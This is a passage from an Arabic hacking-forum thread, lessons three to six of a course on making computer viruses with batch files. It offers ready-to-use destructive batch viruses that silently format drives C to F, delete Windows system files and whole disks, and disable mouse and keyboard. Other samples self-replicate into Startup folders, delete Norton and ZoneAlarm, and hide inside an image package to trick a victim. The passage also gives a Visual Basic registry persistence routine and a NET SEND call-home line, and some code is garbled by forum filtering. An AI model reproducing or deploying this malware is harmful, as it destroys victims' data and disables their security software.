    الباتش+الصورة حاول تنسق النوافذ والان اضغط على البرنامج Virus بالزرار الايسر مره واحده ولا ترفع اصبعك عن الزرار ثم اسحبه الى برنامج WordPad سوف ينتقل الملف الى البرنامج بكل سهوله ثانيا اضغط بالزر الايمن على
    2.الملف الذي انتقل الى WordPad اختر Package Object ثم Edit Package سوف تظهر لك نافذه بأسم Object Packager - Package in ******** اختر قائمة Edit ثم Copy Package ثالثا واخيرا اختر المجلد الذي به ملف EditServer ثم اضغط في المكان الفارغ على الزرار الايمن ثم اختر Paste (لصق) سوف يتكون لك ملف شكله غريب باسم Scrap وهذا |535| هوالملف قد تغير امتداده الى shs واذا ضغط عليه دبل كلك سوف تظهر لك صوره وسوف يشتغل ايضا ملف الباتش الذي دمجته مع الصوره والآن قد حصلت على باتش مرفق بصوره .
    الامر Call يتصل في ملف معين اما الامر start يبدأ بتنفيذ امر او تشغيل برنامج
    مثال (1) :
    كود:

    call attrib -h -r c:autoexec.bat >nul

    اخوي في هذا المثال استخدمنا الامر Call للاتصال في الملف autoexec و قمنا بتغير خصائصه
    مثال (2) :
    كود:

    start MSPaint

    في هذا المثال امرنا بتشغيل برنامج الرسام اول ما يبدا الفيروس عمله
    واريد المستخدم مثلا يضغط حرف y ويضغط enter وينفذ امر معين وn وenter يتنفذ امر اخر
    اخي سوف اعطيك مثال عندما تقوم بالفورمات سوف يسألك الحاسب هل انت متأكد اجب بـ Y,N هنا نكتب هذا الايعاز لتجاهل الرسالة و الا اذ لم نكتب الايعاز سوف يظهر مثلا رسالة تقول للضحية سوف تقوم بحذف مجلد الوندوز هل انت متأكد من ذلك ... و اكيد سوف يجب بـ لا و هكذا لا يعمل الفيروس

  4. #4
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    الدرس الثالث


    اليوم يا شباب راح انكمل دروس احتراف صناعة الفيروسات عن طريق المفات الدفاعية Batch Files المهم نحن بهذاك الدرس اتعلمنا بعض الايعزات و طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي امثلة عن العمل مع الملفات اخواني انا في هذه الدروس اعلمكم على كيفية التعامل مع الملفات الدفاعية لانه بعد التعلم سوف تقدر ان تصنع فيروسات بدون مساعدة من اي شخص و تصنعون فيروسات غير مكشوفة ان شاء الله
    1-اوامر و امثلة :
    del - Delete File
    del c:\windows\*.txt
    الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل ما يوجد في مجلد الوندوز

    deltree - Delete Folder
    deltree \y c:\windows
    الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا الامر لايعمل علي الاكس بي يعمل علي 98 اوك .
    call - Open Or Call Another .bat File
    call c:\windos\anything.bat
    الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و نقل ...
    cls - Clear The Screen
    الشرح : هذا الامر من اجل تنظيف الشاشة من الاحرف
    echo - Allows You To Write Anything
    echo hahaha i will kill yr computer
    الشرح : هذا الامر من احدى اجمل الايعازات و هو يجعل الضحية |596| يقرأ المكتوب مثلاً كتبة انا دمرتك يمكنه قرائته اي انه فقط لكتابة السطور
    goto - To Go To a Nother Section In a Batch File
    :start
    echo i hack you
    goto next
    :next
    del c:\windows\*.exe
    الشرح : في هذا الامثال استخدمنا الامر go to يعمل على |554| الذهاب الى امر اخر لتنفيذه
    copy %0 - To Copy The Running File To Another Place
    copy %0 c:My********\anything.bat
    الشرح : اما عن هذا الامر فهو مخصص لنسخ ملف copy

    2.طريقة تغير امتداد Batch عن طريق Dos :
    اذهب الى start اكتب command تفتح لك شاشة سوداء مكتوب فيها
    cd:\windows
    انت في هذه الحالة تكتب
    ..cd
    كرر هذا الامر الى ان تجعلها
    بعد ما تنتهي من هذا الامر تذهب الى my cumputer ثم تختار (:c)
    وضع الفيروس |4| فية ثم اذهب الى الدوس و اكتب هذا الامر
    cd:\>copy virus.exe virus.com
    virus هو اسم الفيروس تبعك
    وممكن تغير الامتداد الى com,scr,bat
    ملاحظة :*** اخواني انا متأكد من الطريقة و مجربة و ناجحة 100% اكو شيء ثاني ليس تغير الامتداد بل منع مضادات الفيروسات من حذف الفيروس الطريقة سهلة جدا و ذكية في نفس الوقت كتالي :
    انت مو كونت فيروس كويس اعمل التالي ادخل الى الدوس و ادخل الى ملف الفيروس فرضاً اسم الفيروسmoodax.bat اذن اكتب التالي :
    ren moodax.bat ~moodax*<virus.bat
    هذا الامر يمنع اي شخص من حذف الفيروس طبعاً السؤال اخواني انتظروا الدرس التالي للجواب لاكن من اجل العلم فقط لانه الوندوز ما يقبل علامات او اي شيء غير الاحرف و الارقام لاهذا سوف تحدث معركة بين الوندوز و المضاد علقناها

  5. #5
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    الدرس الرابع

    للاحتراف بجد
    المقدمة :
    في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...

    1- الاكود الاكثر استخداماً :
    في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
    1.هذا الكود لمنع كشف المضاد على الفايروس

    كود:

    call attrib -h -r c:autoexec.bat >nul



    ------------------------------------
    2.هذا الكود للفورمات

    كود:

    echo format a: /q /u /autotest >nul >>c:autoexec.bat



    ------------------------------------
    3.هذا كود للفورمات لكن بالختصار
    echo & /autotest >nul >>c:\autoexec.bat ألاولى تعنى انسخ الامر القادم الى
    (طبعاً معروف من الكود الاول انة الى الاوتواكسك)
    الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
    yes and NO
    لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
    ------------------------------------
    4.هذا كود فورمات كل الاقراص |385|

    كود:

    echo format c: /q /u /autotest >nul >>c:autoexec.bat

    كود:

    echo format d: /q /u /autotest >nul >>c:autoexec.bat
    echo format e: /q /u /autotest >nul >>c:autoexec.bat
    echo format f: /q /u /autotest >nul >>c:autoexec.bat

    ------------------------------------
    5.هذا كود فيروس العد التنازلي و علاجه :

    الكود:
    echo off@
    shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
    كود:
    echo off@
    shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
    اغلاق الجهاز على الشبكة
    echo off@
    shutdown -s -t 15 -c "message" -m \\namecomputer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير namecomputer الى الجهاز المراد اغلاقه
    العلاج :
    shutdown –a
    2-مجموعة من الكودات مع الشرح (المفصل) :
    اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
    1 - اذ اردت كتابت كود فيروسي يعمل التالي
    يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
    ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة

    كود:

    call attrib -h -r c:autoexec.bat >nul

    كود:

    echo كود دوسى >nul >>c:autoexec.bat

    والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة

    كود:

    call attrib -h -r c:autoexec.bat >nul

    كود:

    echo كود دوسى /autotest >nul >>c:autoexec.bat

    مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة

    كود:

    call attrib -h -r c:autoexec.bat >nul

    كود:

    echo كود دوسى /autotest >nul >>c:autoexec.bat
    echo كود دوسى >nul >>c:autoexec.bat

    يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
    ------------------------------------
    2 - اذ اردت كتابت كود فايروسي يعمل التالي
    يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
    بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يالي


    كود:

    call attrib -h -r c:autoexec.bat >nul

    كود:

    echo d: >nul >>c:autoexec.bat
    echo Del x.txt >nul >>c:autoexec.bat

    التحليل
    -------

    كود:

    call attrib -h -r c:autoexec.bat >nul



    ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
    c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
    d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
    اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون

    كود:

    call attrib -h -r c:autoexec.bat >nul



    (اساسى)

    كود:

    echo d: >nul >>c:autoexec.bat



    (الدخول على الدريف دى)

    كود:

    echo Del x.txt >nul >>c:autoexec.bat



    (الغاء ملف امسة اكس تكست)
    تذكر :::::

    كود:

    echo كود الدوس >nul >>c:autoexec.bat



    ------------------------------------
    3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص

    كود:

    call attrib -h -r c:autoexec.bat >nul

    كود:

    echo d: >nul >>c:autoexec.bat
    echo Del *.txt >nul >>c:autoexec.bat

    ------------------------------------
    4 - اذ اردت الغاء كل الملفات التي امتدادها .zip في القرص

    كود:

    call attrib -h -r c:autoexec.bat >nul

    كود:

    echo d: >nul >>c:autoexec.bat
    echo Del *.zip >nul >>c:autoexec.bat

    ------------------------------------
    5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :

    كود:

    @Echo off

    كود:

    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys

    تحليلة :
    c: دخلنا على السى

    كود:

    cd %WinDir%System



    دخلنا على ملف السيستم فى الوندوز

    كود:

    deltree /y *.dll



    الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
    cd\ خرجنا بعد تنفيذ العملية الاولى

    كود:

    deltree /y *.sys



    و الغاء كل ملفات sys. فى الوندوز.
    هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه لا استطيع صنع فيروس يعتمد على التاريخ عن طريق الملفات الدفاعية يعمل هذا الكود على ايقاف المضادات و فورمات C,D,E,F فقط و اذ اردت يمكنك الاضافة , و كود اعادة التشغيل اعتقد انه انت قرأت الدرس الثاني و الاول ...
    كود:

    كود:

    @Echo Virus Format

    كود:

    @Echo www.3asfh.comvb
    @Echo By RBG-7
    call attrib -h -r c:autoexec.bat >nul
    format c: /q /u /autotest >nul >>c:autoexec.bat
    format d: /q /u /autotest >nul >>c:autoexec.bat
    format e: /q /u /autotest >nul >>c:autoexec.bat
    format f: /q /u /autotest >nul >>c:autoexec.bat
    shutdown -s
    End

    اتمنى انه يكون واضح ..

    كود:

    call attrib -h -r c:autoexec.bat >nul



    Call : للاتصال في ملف من نوع Bat
    Attrib : هذا امر خاص بالدوس يعمل على تغير خصائص ملف
    -h : اخفاء
    -r : جعله فقط قراءة
    c:\autoexec.bat : الملف المراد التنفيذ عليه
    > nul : هذا الامر شروح في الدرس الاول و يعمل على عدم سؤال المستخدم

    كود:

    format a: /q /u /autotest >nul >>c:autoexec.bat



    Format : امر الفورمات
    a: الامر يطبق على القرص A
    /q : سريع
    /u : يقوم بحذف الملفات الاساسية
    /autotest : هذا الامر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب>nul >> : نقل من دون سؤال
    c:\autoexec.bat : الملف الذي سوف يطبق به الكود
    إقتباس:
    echo off@
    shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
    اغلاق الجهاز على الشبكة
    @echo off : عدم استخدام الامر Echo
    اخوي البعض يسأل لمذا وضع هذا الامر في بعض الاحيان يخطاء المبرمج و يكتب الامر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذshutdown -s : اطفاء الحاسب
    -t : الوقت
    30 : ثانية
    -c : اظهار رسالة
    message : اكتب الرسالة التي تريد

    كود:

    @Echo off

    كود:

    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys

    نعم اخوي هذا كود كامل لفيروس تدمير النظام لا ينكتب في سطر واحد و السبب لانه كود كامل و ليس امر
    انتهي الدرس ومني ليكم تحياتي نلتقي في الدرس القادم ...............................

  6. #6
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    الدرس الخامس
    الدرس دا شرح عبارة عن اسئلة واجابة
    1-اسئلة و حلول :

    س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس
    ------------------------------------
    عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل
    اوامر البدء ...
    اضف هذا الكود لعمل ريستارت :


    كود PHP:
    c:windowsrundll.exe user.exe,exitwindow***ec


    ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
    ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
    س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
    ------------------------------------
    هذا كود الغلاق
    س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
    ------------------------------------
    لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
    س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
    ------------------------------------
    لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
    س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
    ------------------------------------
    لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ...
    س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى
    ------------------------------------
    نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
    2-كودات فيروسات جاهزة :
    1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :



    كود PHP:
    call attrib -h -r c:autoexec.bat >nul
    echo format c: /q /u /autotest >nul >>c:autoexec.bat
    echo format d: /q /u /autotest >nul >>c:autoexec.bat
    echo format e: /q /u /autotest >nul >>c:autoexec.bat
    echo format f: /q /u /autotest >nul >>c:autoexec.bat
    c:windowsrundll.exe user.exe,exitwindow***ec

    ------------------------------------
    .فيروس عمل فورمات C,D,E,F والطابعه :


    كود PHP:
    call attrib -h -r c:autoexec.bat >nul
    echo format c: /q /u /autotest >nul >>c:autoexec.bat
    echo format d: /q /u /autotest >nul >>c:autoexec.bat
    echo format e: /q /u /autotest >nul >>c:autoexec.bat
    echo format f: /q /u /autotest >nul >>c:autoexec.bat


    ------------------------------------
    3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :



    كود PHP:
    del C:WINDOWSNOTEPAD.EXE
    copy %0 C:WINDOWSNOTPAD.EXE


    ------------------------------------

    4.فايروس افتراضي :



    كود PHP:
    @echo off
    cls
    :start
    if exist c:AUTOEXEC.bat goto delc
    if exist d:AUTOEXEC.bat goto deld
    if exist e:AUTOEXEC.bat goto dele
    if exist f:AUTOEXEC.bat goto delf
    elc
    del c:
    goto end
    eld
    del d:
    goto end
    ele
    del e:
    goto end
    elf
    del f:
    goto end
    end


    ------------------------------------
    5.فايروس النظام :



    كود PHP:
    @echo off
    cls
    :start
    if exist c:windows goto next
    if not exist c:windows goto copy
    :next
    del c:windows
    goto end
    :copy
    cd c:
    md virus
    goto end
    end


    ------------------------------------
    6.فايروس الدوس :



    كود PHP:
    @echo off
    C:WINDOWSrundll.exe mouse,disable
    C:WINDOWSrundll.exe keyboard,disable
    del c:command.com
    del c:Io.sys
    del c:Config.sys
    del c:Msdos.sys
    del c:windowssystem32command.com
    deltree /y C:WINDOWSCOMMAND*.*
    deltree /y C:WIN98COMMAND*.*
    deltree /y C:WINmeCOMMAND*.*
    deltree /y C:WIN_meCOMMAND*.*
    deltree /y C:WINxpCOMMAND*.*
    deltree /y C:WIN_xpCOMMAND*.*
    del d:command.com
    del d:Io.sys
    del d:Config.sys
    del d:Msdos.sys
    del d:windowssystem32command.com
    deltree


    ------------------------------------
    7.فيروس قاتل ملفات السستم :



    كود PHP:
    @echo off
    c:
    cd C:WINDOWSSystem
    deltree /y *.dll
    cd
    deltree /y *.sys
    c:
    cd C:WINDOWSSystem32
    deltree /y *.dll
    cd
    deltree /y *.sys
    d:
    cd C:WINDOWSSystem
    deltree /y *.dll
    cd
    deltree /y *.sys
    d:
    cd C:WINDOWSSystem32
    deltree /y *.dll
    cd
    deltree /y *.sys
    CLS


    ------------------------------------
    8.فيروس قاتل الفأرة و لوحة المفاتيح :



    كود PHP:
    @echo off
    C:WINDOWSrundll.exe mouse,disable
    C:WINDOWSrundll.exe keyboard,disable
    copy key.BAT C:WINDOWSstartm~1programsstartup
    copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
    copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
    CLS


    ------------------------------------
    9.فيروس يمنع استخدام خصائص الشاشة :



    كود PHP:
    @echo off
    cd
    cd
    deltree /y c:/windows/RUNDLL32.exe
    cd
    cd


    ------------------------------------
    10.فيروس تدمير سطح المكتب :



    كود PHP:
    @echo off
    cd
    cd
    deltree /y c:/windows/desktop
    cd
    cd


    ------------------------------------
    11.فيروس قاتل النورتن :



    كود PHP:
    @echo off
    %WinDir%rundll.exe mouse,disable
    %WinDir%rundll.exe keyboard,disable
    copy hahahah.BAT %windir%startm~1programsstartup
    copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
    copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
    deltree /y c:progra~1norton~1*.*
    deltree /y d:progra~1norton~1*.*
    deltree /y c:progra~1zonela~1*.*
    deltree /y d:progra~1zonela~1*.*
    cls


    ------------------------------------
    12.فيروس التدمير :



    كود PHP:
    echo off@
    c:windowsrundll.exe mouse,disable
    c:windowsrundll.exe keyboard,diable
    goto del
    el
    deltree y c:*.*
    goto copy
    :copy
    copy %0 C:WINDOWSStart MenuProgramsStartUpname of virus.bat
    cls
    puse


    ------------------------------------
    13.فيروس يمحى جميع الملفات التى على الهارد :



    كود PHP:
    @echo off
    c:
    cd
    deltree /y *.*
    d:
    cd
    deltree /y *.*



    ------------------------------------
    14.فيروس خاص :



    كود PHP:
    echo off@
    del system.ini
    del win.ini
    del auto exec.bat
    del config.sys


    ------------------------------------

    15.اهم فايروس فايروس مدمر :


    كود PHP:
    echo off@
    cls
    call attrib -h -r c:autoexec.bat >nul
    echo @echo off >c:autoexec.bat
    echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
    echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
    echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
    echo deltree /y c:windows*.* >nul >>c:autoexec.bat
    echo format c: /q /u /autotest >nul >>c:autoexec.bat


    ------------------------------------
    16.فيروس عمل فورمات للجهاز فورا :


    كود PHP:
    echo off@
    cls
    call attrib -h -r c:autoexec.bat >nul
    echo @echo off >c:autoexec.bat
    echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
    echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
    echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
    echo deltree /y c:windows*.* >nul >>c:autoexec.bat
    echo format c: /q /u /autotest >nul >>c:autoexec.bat


    ------------------------------------
    17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :


    كود PHP:
    call attrib -h -r c:autoexec.bat >nul
    @Echo off
    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys


    ------------------------------------
    18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره


    @
    كود PHP:
    Echo off
    c:
    cd %WinDir%System
    deltree /y *.dll
    cd
    deltree /y *.sys


    ------------------------------------
    19.فيروس عمل فورمات C,D,E,F والطابعه وقفل الجهاز :


    كود PHP:
    call attrib -h -r c:autoexec.bat >nul
    echo format c: /q /u /autotest >nul >>c:autoexec.bat
    echo format d: /q /u /autotest >nul >>c:autoexec.bat
    echo format e: /q /u /autotest >nul >>c:autoexec.bat
    echo format f: /q /u /autotest >nul >>c:autoexec.bat
    c:windowsrundll32.exe user.exe,exitwindows


    ------------------------------------
    20.فيروس النسخ الالي :


    @
    كود PHP:
    echo off
    :start
    cls
    copy %0 c:/virusautocopy.bat
    copy %0 c:/windows/virusautocopy.bat
    copy %0 d:/virusautocopy.bat
    copy %0 c:/My ********s/virusautocopy.bat
    end


    ------------------------------------
    21.فايروس ينسخ نفسة في network و ملفات winzip و start up ( اهم فيروس – ) :


    كود PHP:
    send msg to any one onlin in the network and start many programs
    del all c files and copy it self in any dirve
    if exist d:
    copy %0 d:game.bat
    copy %0 d:autoexec.bat
    @echo off
    echo Virus Name:A7meedye
    c:windowsrundll.exe mouse,disable
    c:windowsrundll.exe keyboard,disable
    goto network
    :network
    cls
    if exist c:winnt goto winnt
    copy %0 c:windowsalluse~1applic~1Network89.bat
    copy %0 c:windowsalluse~1destkopNetwork89.bat
    copy %0 c:windowsalluse~1startm~1Network89.bat
    copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t
    goto zip
    zip:
    cls
    @dir /s /b /l c:winzip32.exe | set wz=
    @FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
    goto startup
    startup:
    cls
    copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat
    goto del
    del:
    deltree /y C:WINDOWS*.*
    deltree /y C:Program Files*.*
    deltree /y C:My ********s*.*
    goto msg
    msg:
    NET SEND 127.0.0.1 you got a virus
    goto start
    :start
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start MSPaint
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    start Notepad
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    Start IExplorer "http://www.top-sec.com/vb
    goto end
    :end
    cls
    echo Im **** your computer
    echo sorry about what my virus do but you are stuped
    echo The Virus Made By A7meedye
    puse


    ------------------------------------

  7. #7
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    الدرس السادس
    الدرس هذا مهم جدا
    اخواني الاعزاء هذا الدرس يعتبر خاص في الدورة لانه عندما طرحة الدورة لقد نسيت بعض الاشياء المهمة و يجب علي اكمالها و ان شاء الله في هذا الدرس سوف ابري ذمتي من اجل اكمال الدورة .
    1.طريقة تشغيل الفيروس عند بدا التشغيل :
    سوف نستخدم لغة الفيجول بيسك و يجب على الشخص الذي يريد استخدام الكود لديه مستوى و لو فوق الوسط ليعرف وضع الكودات على كلاً يوجد كتاب و دورة الاستاذ الصقر الجراح يمكن من خلاالها تعلم الفيجول بيسك و انا انصح به المهم الان سوف اعطيكم الكودات و مناطق وضعها اما عن كيفية دمج الفيروس مع الفيجول فراجعوا الدرس الاول لمعرفة الطريقة الكاملة .

    كود PHP:
    كود بدا التشغيل :

    في الموديل :

    Option Explicit

    Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long

    Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

    Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long

    Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long

    Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

    Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long

    Private Const READ_CONTROL = &H20000

    Private Const KEY_QUERY_VALUE = &H1

    Private Const KEY_SET_VALUE = &H2

    Private Const KEY_CREATE_SUB_KEY = &H4

    Private Const KEY_ENUMERATE_SUB_KEYS = &H8

    Private Const KEY_NOTIFY = &H10

    Private Const KEY_CREATE_LINK = &H20

    Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL

    Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL

    Private Const KEY_EXECUTE =

    KEY_READ

    Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE

    + KEY_SET_VALUE + KEY_CREATE_SUB_KEY

    + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY

    + KEY_CREATE_LINK + READ_CONTROL

    Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"

    Private Const HKLM =

    &H80000002

    ' استخدم الامر التالي لالغاء التشغيل التلقائي Public Sub DoNotRun(ProgramName

    As String) Dim hKey As Long Dim Ret

    As Long ' فتح

    المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS,

    hKey) ' حذفها من

    مسجل النظام. Ret =

    RegDeleteValue(hKey, ProgramName) ' إغلاق

    المفتاح RegCloseKey hKey End

    Sub Public Sub RunWhenStartup(ProgramName

    As String, ProgramPath As

    String) Dim hKey

    As Long Dim Ret As Long ' فتح

    المفتاح المطلوب Ret =

    RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) '

    إنشاء قيمة جديدة بإسم

    البرنامج وعنوانه. Ret =

    RegSetValueEx(hKey,

    ProgramName, 0&, 1,

    ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData,

    vbFromUnicode)) +

    1) '

    إغلاق المفتاح RegCloseKey hKey End Sub ------------ في

    الفورم : RunWhenStartup "عنوان",

    App.Path & "" &

    App.EXEName & ".exe" <

    /FONT

    >


    2.كيفية التبليغ : (فقط في الشبكات)
    اعرف جيد جدا انه لا يوجد فيروس في العالم يحوي شيء اسمه تبليغ لاكن بعد الان سوف يوجد نعم اخواني هذه الطريقة المجربة و لا يوجد به اي خطا كود بسيط يعادل الف برامج قراصنة الانترنيت كل ما علينا فعله هو اضافة هذا السطر الى كود الفيروس مع تغير بعض الاشياء كاتالي :


    كود PHP:
    NET SEND 127.0.0.1 Run Virus Now

    الان سوف نجري بعض التغيرات
    Run Virus Now ضع الرسالة التي تريد ان تصلك و حتى لو في العربي
    127.0.0.1 ضع رقم ip الخاص بك و سوف يتم ارسال الرسالة الى ip الخاص بك
